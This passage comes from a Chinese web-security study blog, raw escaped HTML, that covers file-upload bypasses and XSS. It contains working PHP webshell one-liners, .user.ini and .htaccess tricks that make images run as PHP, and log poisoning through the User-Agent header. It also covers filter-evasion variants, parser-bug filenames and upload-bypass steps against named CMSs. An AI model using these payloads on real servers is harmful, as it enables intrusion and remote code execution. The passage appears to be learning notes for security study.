wp-elements-0d86572a2089cdf8cfae6fec8db06fd7\">Content-Type\uff1aimage\/jpeg\uff08php\u6587\u4ef6\u4e3a\uff1aapplication\/octet-stream\uff09<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">JS\u9a8c\u8bc1+user.ini\uff08PHP\uff09<\/h3>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-22f9d07f75d2e58cc0c2b2e5ecad3e58\">.user.ini\uff1aauto_prepend_file=test.png\uff08\u5728\u52a0\u8f7dindex.php\u6587\u4ef6\u524d\u5148\u7528php\u5bf9test.png\u8fdb\u884c\u89e3\u6790\uff09\uff1b<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-f50cba398eb804cf9d138520fc85e61c\">\u5229\u7528\u6761\u4ef6\uff1a\u5f53\u524d\u76ee\u5f55\u6709\u6307\u5411index.php\uff08\u6587\u4ef6\u8981\u5b58\u5728\uff09\uff1b\u8981\u6ee1\u8db3PHP\u7248\u672c\uff087.x\uff09\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-e9856d4d6337b5562b593f9ee0c1ab4c\">\u82e5\u5f53\u524d\u76ee\u5f55\u6ca1\u6709index.php\u4f46\u6709\u6307\u5411\u5219\u53ef\u4ee5\u8003\u8651\u4e0a\u4f20\u4e00\u4e2aindex.php\uff08\u5185\u5bb9\u968f\u610f\uff09\uff0c\u7136\u540e\u518d\u4e0a\u4f20.user.ini\u5305\u542b\u65e5\u5fd7\uff1aauto_prepend_file=\/var\/log\/nginx\/access.log\uff0c\u8bbf\u95ee\u5730\u5740\u65f6\u5728UA\u5934\u4e2d\u5199\u5165\u540e\u95e8\u4ece\u800c\u7ed5\u8fc7\u8fc7\u6ee4\u5c06\u540e\u95e8\u4ee3\u7801&lt;?=eval($_POST[&#8216;shell&#8217;]);?&gt;\u5199\u5165\u65e5\u5fd7\u6587\u4ef6\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">JS\u9a8c\u8bc1+user.ini+\u77ed\u6807\u7b7e<\/h3>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-6c18caa810fc939f6309b31fef8ed60f\">\u56db\u79cd\u5199\u6cd5(\u4e00\u4e9b\u77ed\u6807\u7b7e\u7684\u5229\u7528\u9700\u8981\u6709\u914d\u7f6e\u6761\u4ef6)\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>&lt;? echo &#8216;123&#8217;;?&gt; \/\/\u524d\u63d0\u662f\u5f00\u542f\u53c2\u6570short_open_tags=on<\/li>\n\n\n\n<li>&lt;?=(\u8868\u8fbe\u5f0f)?&gt; \/\/\u4e0d\u9700\u8981\u5f00\u542f\u53c2\u6570\u8bbe\u7f6e<\/li>\n\n\n\n<li>&lt;% echo &#8216;123&#8217;;%&gt; \/\/\u524d\u63d0\u662f\u5f00\u542f\u914d\u7f6e\u53c2\u6570asp_tags=on<\/li>\n\n\n\n<li>&lt;script language=&#8221;php&#8221;&gt;echo &#8216;1&#8217;&lt;\/script&gt; \/\/\u4e0d\u9700\u8981\u4fee\u6539\u53c2\u6570\u5f00\u5173<\/li>\n<\/ul>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-ac27c6d0accaceb8207da76a4d018907\">.user.ini\uff1aauto_prepend_file=test.png<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-1903fd12498a1e2b1f20672e59ce23e4\">test.png\uff1a&lt;?=eval($_POST[&#8216;shell&#8217;]);?&gt;<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-8c929a27bf8e638cf031609d6538f9d3\">\u82e5\u6709\u5bf9&#8221;[&#8220;\u3001&#8221;]&#8221;\u8fdb\u884c\u8fc7\u6ee4\u5219\u7528&#8221;{&#8220;\u3001&#8221;}&#8221;\u4ee3\u66ff\uff1a&lt;?=eval($_POST{&#8216;shell&#8217;})?&gt;<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-f59d284fdfd8f53d6b32dc061b3881cd\">\u82e5\u8fd8\u6709\u5bf9&#8221;;&#8221;\u8fc7\u6ee4\u5219\u76f4\u63a5&lt;?=system(&#8216;tac ..\/fl*&#8217;)?&gt;<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-1a5a2f7547eec3b1ea32ca5f0dd67af5\">\u82e5\u8fd8\u6709\u5bf9&#8221;(&#8220;\u3001&#8221;)&#8221;\u8fc7\u6ee4\uff0c\u5219&lt;?=&#8217;tac \/var\/www\/html\/fl*&#8217;?&gt;&lt;?=echo &#8216;tac \/var\/www\/html\/fl*&#8217;?&gt; <\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-0b453e6e740bb05e787219aaed4bce8d\">\u8fc7\u6ee4\u592a\u4e25\u91cd\u7684\u601d\u8def\uff1a\u5305\u542b\u9ed8\u8ba4\u65e5\u5fd7\u6587\u4ef6\uff0c\u65e5\u5fd7\u8bb0\u5f55UA\u5934\uff08user-agent\uff09\uff0cUA\u5934\u5199\u540e\u95e8\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-ac27c6d0accaceb8207da76a4d018907\">.user.ini\uff1aauto_prepend_file=test.png<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-ba05a675ef053910817162bab4e25faf\">test.png\uff1a&lt;?=include&#8221;\/var\/lo&#8221;.&#8221;g\/nginx\/access.lo&#8221;.&#8221;g&#8221;?&gt;<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-910030ec38f18f2ff32c2d5dc2696d44\">\u6709\u6761\u4ef6\u4e5f\u53ef\u4ee5include\u5305\u542b\u8fdc\u7a0b\u6587\u4ef6(\u8fc7\u6ee4\u4e86&#8221;.&#8221;\u7684\u65f6\u5019\u5c1d\u8bd5\u5305\u542b\u8fdc\u7a0b\u6587\u4ef6\uff0c\u5176\u4e2durl\u4f7f\u7528\u957f\u5730\u5740-ip\u8f6c\u6362\u957f\u5730\u5740-\u4ece\u800c\u907f\u514d\u4f7f\u7528&#8221;.&#8221;)\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">.htaccess<\/h3>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-0c139b634e68bb964d4f3d21bb7f1306\">.htaccess\u9ed8\u8ba4\u4e0d\u652f\u6301nginx\uff0c\u8bbe\u7f6e\u540e\u652f\u6301\uff1b.htaccess\u53ef\u901a\u8fc7\u8bbe\u7f6e\u5b9e\u73b0\u6587\u4ef6\u89e3\u6790\u8bbe\u7f6e<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-e9967c2617149f4bbe6a012a5287d2cb\">\u8c03\u7528php\u89e3\u6790.png\u540e\u7f00\u6587\u4ef6\uff1aAddType application\/x-httpd-php .png<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u4e8c\u6b21\u6e32\u67d3<\/h3>\n\n\n\n<p>\u53c2\u8003\u6587\u7ae0\uff1a<a href=\"https:\/\/blog.csdn.net\/qq_40800734\/article\/details\/105920149\" target=\"_blank\" rel=\"noreferrer noopener\"><\/a><a href=\"https:\/\/blog.csdn.net\/qq_40800734\/article\/details\/105920149\">\u6587\u4ef6\u4e0a\u4f20\u4e4b\u4e8c\u6b21\u6e32\u67d3\u7ed5\u8fc7_\u4e8c\u6b21\u6e32\u67d3\u7ed5\u8fc7\u600e\u4e48\u64cd\u4f5c-CSDN\u535a\u5ba2<\/a><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u5224\u65ad\u4e0a\u4f20\u524d\u548c\u4e0a\u4f20\u540e\u7684\u6587\u4ef6\u5927\u5c0f\u53ca\u5185\u5bb9<\/li>\n\n\n\n<li>\u5224\u65ad\u4e0a\u4f20\u540e\u7684\u6587\u4ef6\u8fd4\u56de\u6570\u636e\u5305\u5185\u5bb9<\/li>\n<\/ul>\n\n\n\n<h4 class=\"wp-block-heading\">png\u4e8c\u6b21\u6e32\u67d3<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-ddcedf1cfaf71078cea990b9ddccf990\">\u6728\u9a6c\u5185\u5bb9\uff1a&lt;?$_GET[0]($_POST[1]);?&gt;<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-95815055ee888b98a2fcd0f8c79f171d\">get 0=&#8217;system&#8217;;<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-9d03155b6d7e0c6ac565e94d828dcb01\">post 1=&#8217;tac flag.php&#8217;;<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-43546a15d4820610fe63ed216fa3f180\">\u8fd9\u79cd\u5229\u7528\u65b9\u5f0f\u6709\u6761\u4ef6\uff1a\u975e\u8def\u5f84\u5730\u5740\uff0c\u800c\u662f\u6709\u6587\u4ef6\u5305\u542b-download.php?image=xxx.png<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">jpg\u4e8c\u6b21\u6e32\u67d3<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-4fb2b0098f9e0cab4239154857f7626d\">\u6587\u4ef6\u4e2d\u6dfb\u52a0\u5185\u5bb9<strong>CREATOR: gd-jpeg v1.0(using IJG JPEG v80),default quality<\/strong> \/\/\u8c03\u7528php\u6267\u884c<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\u5148\u4e0a\u4f20a.jpg\u6b63\u5e38\uff0c\u4e0b\u8f7d\u56de\u6765\u547d\u540d\u4e3ab.png\uff0c\u53d1\u73b0\u5df2\u88ab\u6e32\u67d3<\/li>\n\n\n\n<li>\u7528b.png\u914d\u5408\u811a\u672c\u751f\u6210\u5e26\u540e\u95e8\u4ee3\u7801\u56fe\u7247c.png\u540e\u518d\u4e0a\u4f20<\/li>\n<\/ol>\n\n\n\n<h3 class=\"wp-block-heading\">\u4e2d\u95f4\u4ef6\u6587\u4ef6\u89e3\u6790-IIS&amp;Apache&amp;Nginx<\/h3>\n\n\n\n<h4 class=\"wp-block-heading\">IIS 6.0-7.X<\/h4>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u6587\u4ef6\u540d\u89e3\u6790\u6f0f\u6d1e\uff1ax.asp;.x.jpg<\/li>\n\n\n\n<li>\u76ee\u5f55\u540d\u89e3\u6790\u6f0f\u6d1e\uff1ax.asp\/x.jpg<\/li>\n\n\n\n<li>IIS7.x\u4e0eNginx\u89e3\u6790\u6f0f\u6d1e\u4e00\u81f4<\/li>\n<\/ul>\n\n\n\n<h4 class=\"wp-block-heading\">Apache<\/h4>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u6362\u884c\u89e3\u6790\u6f0f\u6d1e\uff1aCVE-2017-15715\uff08x.php%0a\uff09<\/li>\n\n\n\n<li>.htaccess\u914d\u7f6e\u4e0d\u5f53\uff1aAddHandler application\/x-httpd-php .php(php\u4f1a\u89e3\u67901.php.png\u6587\u4ef6)<\/li>\n<\/ul>\n\n\n\n<h4 class=\"wp-block-heading\">Nginx<\/h4>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u6587\u4ef6\u540d\u903b\u8f91\u6f0f\u6d1e\uff1aCVE-2013-4547(\u6587\u4ef6\u540d\u540e\u7f00\u540e\u9762\u52a0\u4e2a\u7a7a\u683cx.jpg%20%00.php)<\/li>\n\n\n\n<li>nginx.conf\u914d\u7f6e\u4e0d\u5f53\uff1b\u8be5\u6f0f\u6d1e\u4e0eNginx\u3001php\u7248\u672c\u65e0\u5173\uff0c\u5c5e\u4e8e\u7528\u6237\u914d\u7f6e\u4e0d\u5f53\u9020\u6210\u7684\u89e3\u6790\u6f0f\u6d1e\uff1ax.jpg\/*.php<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">WEB\u5e94\u7528\u7f16\u8f91\u5668\u5b89\u5168<\/h3>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-9b841cdb12717cb4152abb145dcf55df\">\u786e\u5b9a\u76ee\u6807\u6240\u7528\u7684<strong>\u7f16\u8f91\u5668<\/strong>\u5e76\u641c\u7d22\u76f8\u5173\u7684\u53ef\u80fd\u5b58\u5728\u7684\u6f0f\u6d1e\u4ee5\u53ca\u5229\u7528\u65b9\u5f0f\u3002\uff08\u5176\u5b9e\u7b97\u662f\u7b2c\u4e09\u65b9\u63d2\u4ef6\u5b89\u5168\u95ee\u9898\u4e86\u5427\uff09<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-51f983908eb15aa2968d95b3f36e7ad1\">\u5e38\u89c1\u7f16\u8f91\u5668\uff1aUeditor,Fckeditor,Kindeditor,Ewebeditor\uff1b<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">CMS\u5b9e\u4f8b\u6f0f\u6d1e\u6316\u6398<\/h3>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-f50d48e9faf511d17b02b9803e283faa\"><strong>\u9ed1\u76d2\u601d\u8def<\/strong>\uff1a\u5bfb\u627e\u4e00\u5207<strong>\u5b58\u5728\u6587\u4ef6\u4e0a\u4f20<\/strong>\u7684\u529f\u80fd\u5e94\u7528<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u4e2a\u4eba\u7528\u6237\u4e2d\u5fc3\u662f\u5426\u5b58\u5728\u6587\u4ef6\u4e0a\u4f20\u529f\u80fd\uff08\u5934\u50cf\u3001\u6587\u7ae0\uff09<\/li>\n\n\n\n<li>\u540e\u53f0\u7ba1\u7406\u7cfb\u7edf\u662f\u5426\u5b58\u5728\u6587\u4ef6\u4e0a\u4f20\u529f\u80fd\uff08\u56fe\u5e93\u3001\u6587\u7ae0\uff09<\/li>\n\n\n\n<li>\u5b57\u5178\u76ee\u5f55\u626b\u63cf\u63a2\u9488\u6587\u4ef6\u4e0a\u4f20\u6784\u9020\u5730\u5740<\/li>\n\n\n\n<li>\u5b57\u5178\u76ee\u5f55\u626b\u63cf\u63a2\u9488\u7f16\u8f91\u5668\u76ee\u5f55\u6784\u9020\u5730\u5740<\/li>\n<\/ul>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-0e98301fcf520c47737bcd9791afba37\"><strong>\u767d\u76d2\u5ba1\u8ba1\u6d41\u7a0b<\/strong>\uff1a\u4e2d\u95f4\u4ef6\u3001\u7f16\u8f91\u5668\u3001\u529f\u80fd\u4ee3\u7801<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u4e2d\u95f4\u4ef6\u76f4\u63a5\u770b\u8bed\u8a00\u73af\u5883\u5e38\u89c1\u642d\u914d<\/li>\n\n\n\n<li>\u7f16\u8f91\u5668\u76f4\u63a5\u770b\u76ee\u5f55\u7ed3\u6784\u6216\u641c\u7d22\u5173\u952e\u5b57<\/li>\n\n\n\n<li>\u529f\u80fd\u4ee3\u7801\u76f4\u63a5\u770b\u6e90\u7801\u5e94\u7528\u6216\u641c\u7d22\u5173\u952e\u5b57<\/li>\n<\/ul>\n\n\n\n<h4 class=\"wp-block-heading\">FineCMS-\u4ee3\u7801\u5e38\u89c4-\u5904\u7406\u903b\u8f91<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-b93cd5559e44e882b84538f248ede9b7\"><strong>\u9ed1\u76d2\u601d\u8def<\/strong>\uff1a\u5bfb\u627e\u4e0a\u4f20\u70b9\u6293\u5305\u4fee\u6539\u7a81\u7834\u83b7\u53d6\u72b6\u6001\u7801\u53ca\u5730\u5740\uff1b\u7531\u4e8e\u5728FineCMS\u9ed1\u76d2\u6d4b\u8bd5\u4e2d\u5f97\u4e0d\u5230\u4e0a\u4f20\u76ee\u5f55\u7684\u5730\u5740\u56de\u663e\uff0c\u6240\u4ee5\u4e0a\u4f20\u6210\u529f\u4e5f\u65e0\u6cd5\u5229\u7528\uff0c\u9700\u8981\u914d\u5408\u767d\u76d2\u5ba1\u8ba1\u627e\u5230\u8def\u5f84\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-b2102ca098597da9ca7029672b7344d8\"><strong>\u767d\u76d2\u5ba1\u8ba1\u6d41\u7a0b<\/strong>\uff1a\u5bfb\u627e\u529f\u80fd\u70b9-\u5bf9\u5e94\u7684\u4ee3\u7801\u6587\u4ef6-\u4ee3\u7801\u5757-\u6293\u5305\u8c03\u8bd5-\u9a8c\u8bc1\u6d4b\u8bd5<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-00d05c019ae2deaeb5efec345d805620\">\u6839\u636eurl\uff1a?s=member&amp;c=account&amp;m=upload\u627e\u5230Controller\u4e0b\u7684member-account.php\uff0c\u5ba1\u8ba1\u5176\u4e2d\u7684upload\u51fd\u6570\u4ee3\u7801\u6bb5\uff0c\u53ef\u4ee5\u5224\u65ad\u51fa\u5b8c\u6574\u8def\u5f84\u540d\u662f$dir.&#8217;0x0.&#8217;.$result[2]\uff0c\u5176\u4e2d$dir=SYS_UPLOAD_PATH.&#8217;\/member&#8217;.$this-&gt;uid.&#8217;\/&#8217;\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">CuppaCMS-\u4e2d\u95f4\u4ef6-.htaccess<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-66792da6bbe64b27d5a602554ea70a9e\"><strong>\u9ed1\u76d2\u601d\u8def<\/strong>\uff1a\u5b58\u5728\u6587\u4ef6\u7ba1\u7406\u4e0a\u4f20\u6539\u540d\u7a81\u7834-\u5148\u4e0a\u4f20x.php.png\uff0c\u518d\u6539\u540d\u4e3ax.php\uff0c\u5b9e\u73b0\u7a81\u7834\u3002\u4f46\u5b58\u5728.htaccess\u914d\u7f6e\u4e86\u9009\u9879\u62d2\u7eddphp\u7b49\u6587\u4ef6\u7684\u6267\u884c\u6743\u9650\u5bfc\u81f4\u540e\u95e8\u8fde\u4e0d\u4e0a\u3002\u4e24\u79cd\u601d\u8def\uff1a1.\u4e0a\u4f20\u5230\u5176\u5b83\u76ee\u5f55\uff08\u5229\u7528..\/\uff09\uff1b2.\u8986\u76d6.htaccess\u6587\u4ef6\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-b2102ca098597da9ca7029672b7344d8\"><strong>\u767d\u76d2\u5ba1\u8ba1\u6d41\u7a0b<\/strong>\uff1a\u5bfb\u627e\u529f\u80fd\u70b9-\u5bf9\u5e94\u7684\u4ee3\u7801\u6587\u4ef6-\u4ee3\u7801\u5757-\u6293\u5305\u8c03\u8bd5-\u9a8c\u8bc1\u6d4b\u8bd5<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-0422247a24bd07a41093c4d14392e384\">\u6839\u636eurl\uff1a\/CuppaCMS-master\/js\/jquer_file_upload\/server\/php\/\u627e\u5230\u4e0a\u4f20\u6587\u4ef6\u7684\u4ee3\u7801\u53ef\u4ee5\u627e\u5230\u5bf9\u6587\u4ef6\u540d\u7684\u8fc7\u6ee4\uff1b<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-11aa4f0991024957e2c8cb0e77d54ce1\">\u5728\/CuppaCMS-master\/js\/filemanager\/api\/index.php\u627e\u5230\u4fee\u6539\u6587\u4ef6\u540d\u7684\u4ee3\u7801\u8fdb\u884c\u5ba1\u8ba1\u53ef\u77e5\u4fee\u6539\u540d\u5b57\u7684\u4ee3\u7801\u6bb5\u63a5\u6536\u4e86\u5b8c\u6574\u7684\u8def\u5f84\u800c<strong>\u6ca1\u6709\u56fa\u5b9a\u540e\u7f00<\/strong>\uff0c\u540c\u65f6<strong>\u53ea\u5728js\u524d\u7aef<\/strong>\u505a\u4e86\u8fc7\u6ee4\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">Metinfo-\u7f16\u8f91\u5668\u5f15\u7528-\u7b2c\u4e09\u65b9\u5b89\u5168<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-ab8632779d72e82de9c48b86f2751b91\"><strong>\u9ed1\u76d2\u601d\u8def<\/strong>\uff1a\u63a2\u9488\u76ee\u5f55\u5229\u7528\u7f16\u8f91\u5668\u6f0f\u6d1e\u9a8c\u8bc1\u6d4b\u8bd5\uff08\u6839\u636e\u7248\u672c\u641c\u4e2aexp\u6709\u5c31\u76f4\u63a5\u6253\uff09\u3002<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u7b2c\u5341\u4e00\u5929\uff1aWEB\u653b\u9632-XSS\u6f0f\u6d1e<\/h2>\n\n\n\n<p>XSS\uff1aCross Site Scripting\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-97b64fb0bf40369467d2ac69f4d2cde3\">\u539f\u7406\uff1a\u653b\u51fb\u8005\u5229\u7528\u7f51\u7ad9\u7a0b\u5e8f\u5bf9\u7528\u6237\u8f93\u5165\u8fc7\u6ee4\u4e0d\u8db3\uff0c\u8f93\u5165\u53ef\u4ee5\u663e\u793a\u5728\u9875\u9762\u4e0a\u5bf9\u5176\u4ed6\u7528\u6237<strong>\u9020\u6210\u5f71\u54cd\u7684Html\u4ee3\u7801<\/strong>\u4ece\u800c\u76d7\u53d6\u7528\u6237\u8d44\u6599\u3001\u5229\u7528\u7528\u6237\u8eab\u4efd\u8fdb\u884c\u67d0\u79cd\u52a8\u4f5c\u6216\u8005\u5bf9\u8bbf\u95ee\u8005\u8fdb\u884c\u75c5\u6bd2\u4fb5\u5bb3\u7684\u4e00\u79cd\u653b\u51fb\u65b9\u5f0f\u3002\u901a\u8fc7\u5728\u7528\u6237\u7aef\u6ce8\u5165\u6076\u610f\u7684\u53ef\u6267\u884c\u811a\u672c\uff0c\u82e5\u670d\u52a1\u5668\u5bf9\u7528\u6237\u7684\u8f93\u5165\u4e0d\u8fdb\u884c\u5904\u7406\u6216\u5904\u7406\u4e0d\u4e25\uff0c\u5219\u6d4f\u89c8\u5668\u5c31\u4f1a<strong>\u76f4\u63a5\u6267\u884c\u7528\u6237\u6ce8\u5165\u7684\u811a\u672c<\/strong>\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-ae389be576450570324eff175d6aeed0\">\u5b58\u5728\u4f4d\u7f6e\uff1a\u6570\u636e\u4ea4\u4e92\u3001\u6570\u636e\u8f93\u51fa\u7684\u5730\u65b9<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>GET\u3001POST\u3001headers\uff08UA\u5934\uff09<\/li>\n\n\n\n<li>\u53cd\u9988\u4e0e\u6d4f\u89c8<\/li>\n\n\n\n<li>\u5bcc\u6587\u672c\u7f16\u8f91\u5668<\/li>\n\n\n\n<li>\u5404\u7c7b\u6807\u7b7e\u63d2\u5165\u548c\u81ea\u5b9a\u4e49<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u7528\u6237\u8d44\u6599<\/li>\n\n\n\n<li>\u5173\u952e\u8bcd\u3001\u6807\u7b7e\u3001\u8bf4\u660e<\/li>\n\n\n\n<li>\u6587\u4ef6\u4e0a\u4f20<\/li>\n<\/ul>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-315bfa897b9bc0750d13c4694d98fc58\">\u5206\u7c7b\uff1a<strong>\u53cd\u5c04\u578b\uff08\u975e\u6301\u4e45\u578b\uff09\u3001\u5b58\u50a8\u578b\uff08\u6301\u4e45\u578b\uff09\u3001DOM\u578b<\/strong>\u3001mXSS\uff08\u7a81\u53d8\u578bXSS\uff09\u3001UXSS\uff08\u901a\u7528\u578b\uff09\u3001Flash XSS\u3001UTF-7 XSS\u3001MHTML XSS\u3001CSS XSS\u3001VBScript XSS\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-a694d3d999580cea780ea845195f8a4f\">\u5371\u5bb3\u6027\uff1a\u7f51\u7edc<strong>\u9493\u9c7c<\/strong>\u83b7\u53d6\u8d26\u6237\u5bc6\u7801\uff1b\u7a83\u53d6COOKIES\uff1b<strong>\u52ab\u6301\u6d4f\u89c8\u5668\u4f1a\u8bdd<\/strong>\u6267\u884c\u4efb\u610f\u64cd\u4f5c\uff0c\u4f8b\u5982\u975e\u6cd5\u8f6c\u8d26\u3001\u53d1\u8868\u65e5\u5fd7\u3001\u90ae\u4ef6\u7b49\uff1b\u5f3a\u5236\u5f39\u51fa\u5e7f\u544a\u9875\u9762\u3001\u5237\u6d41\u91cf\uff1b<strong>\u7f51\u9875\u6302\u9a6c<\/strong>\uff08\u6700\u7231\u4e86\uff01\uff09\uff1b<strong>\u6076\u610f\u64cd\u4f5c<\/strong>\uff0c\u7be1\u6539\u9875\u9762\u4fe1\u606f\u3001\u5220\u9664\u6587\u7ae0\u7b49\uff1b\u8fdb\u884c\u5927\u91cf\u5ba2\u6237\u7aef\u653b\u51fb\u5982DDOS\uff1b\u83b7\u53d6\u5ba2\u6237\u7aef\u4fe1\u606f\u5982\u6d4f\u89c8\u8bb0\u5f55\u3001ip\u3001\u7aef\u53e3\uff1b\u63a7\u5236\u53d7\u5bb3\u673a\u5668\u4f5c\u4e3a\u653b\u51fb\u8df3\u677f\uff1b\u7ed3\u5408CSRF\u8fdb\u4e00\u6b65\u653b\u51fb\uff1b\u63d0\u5347\u7528\u6237\u6743\u9650\uff1b\u4f20\u64ad\u8de8\u7ad9\u811a\u672c\u8815\u866b\uff08!\uff09\u3002<\/p>\n\n\n\n<p>\u53d1\u73b0\u5b58\u5728XSS\u6f0f\u6d1e\u5c31\u53ef\u4ee5\u8fdb\u4e00\u6b65\u5229\u7528beef-xss\u6216XSS\u5e73\u53f0\uff1a<a href=\"https:\/\/xss.pt\/xss.php\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/xss.pt\/xss.php<\/a><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u53cd\u5c04\u578bXSS<\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code>$code=$_GET&#91;'test'];\necho $code.\"&lt;br&gt;\";<\/code><\/pre>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-39d448837789cbe756b296b022081174\">\u82e5\u6b63\u5e38\u4f20\u5165&#8221;?test=123&#8243;\u5219\u53ea\u4f1a\u5728\u9875\u9762\u8f93\u51fa123\uff1b\u4f46\u901a\u8fc7\u6784\u9020\u8bed\u53e5\u4f20\u5165&#8221;?test=&lt;script&gt;alert(&#8216;You have been hacked&#8217;)&lt;\/script&gt;&#8221;\u5219\u4f1a\u5f39\u6846\u663e\u793a\u51fa\u4fe1\u606f\uff0c\u82e5\u5c06alert\u51fd\u6570\u66ff\u6362\u6210\u5176\u4ed6\u5e26\u6709\u6076\u610f\u64cd\u4f5c\u7684\u51fd\u6570\u5219\u53ef\u4ee5\u9020\u6210\u5371\u5bb3\u3002\u8fd9\u79cd\u653b\u51fb\u4ee3\u7801<strong>\u4e0d\u4f1a\u5b58\u50a8\u5728\u6570\u636e\u5e93<\/strong>\u4e2d\uff0c\u4ec5\u662f<strong>\u4e00\u6b21\u6027\u653b\u51fb<\/strong>\uff0c\u6240\u4ee5\u79f0\u4e3a\u53cd\u5c04\u578bXSS\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-911d29ccc5afdd00c83018f931418cf6\">\u53cd\u5c04\u578bXSS\u653b\u51fb\u6d41\u7a0b\uff1a\u6784\u9020\u7279\u5b9a\u94fe\u63a5\u8ba9\u53d7\u5bb3\u8005\u8bbf\u95ee\uff0c\u53d7\u5bb3\u8005\u70b9\u51fb\u540e\uff0c\u53d7\u5bb3\u8005\u7684\u6d4f\u89c8\u5668\u4f1a\u5bf9\u94fe\u63a5\u4e2d\u7684\u6076\u610fXSS\u4ee3\u7801\u8fdb\u884c\u89e3\u6790\u548c\u6267\u884c\uff0c\u8fdb\u800c\u5bf9\u6307\u5b9a\u7684\u670d\u52a1\u5668\u8fdb\u884c\u8bbf\u95ee\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u5b58\u50a8\u578bXSS<\/h3>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color wp-elements-493bdadb9a0e518cde9d85249decf0bd\">\u5b58\u50a8\u578b\u5e38\u89c1\u4e8e\u7559\u8a00\u677f\u7b49\u4f1a\u4e0e\u6570\u636e\u5e93\u8fdb\u884c\u4ea4\u4e92\u7684\u5730\u65b9\u3002\u653b\u51fb\u8005\u690d\u5165\u4e86\u653b\u51fb\u4ee3\u7801\uff0c\u4e4b\u540e\u7684\u4eba\u53ea\u8981\u8bbf\u95ee\u7559\u8a00\u677f\u5c31\u90fd\u4f1a\u6536\u5230XSS\u653b\u51fb\u3002\u653b\u51fb\u4ee3\u7801<strong>\u5199\u5165\u4e86\u540e\u53f0\u6570\u636e\u5e93<\/strong>\uff0c\u6240\u4ee5\u88ab\u79f0\u4e3a\u5b58\u50a8\u578bXSS\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color has-link-color 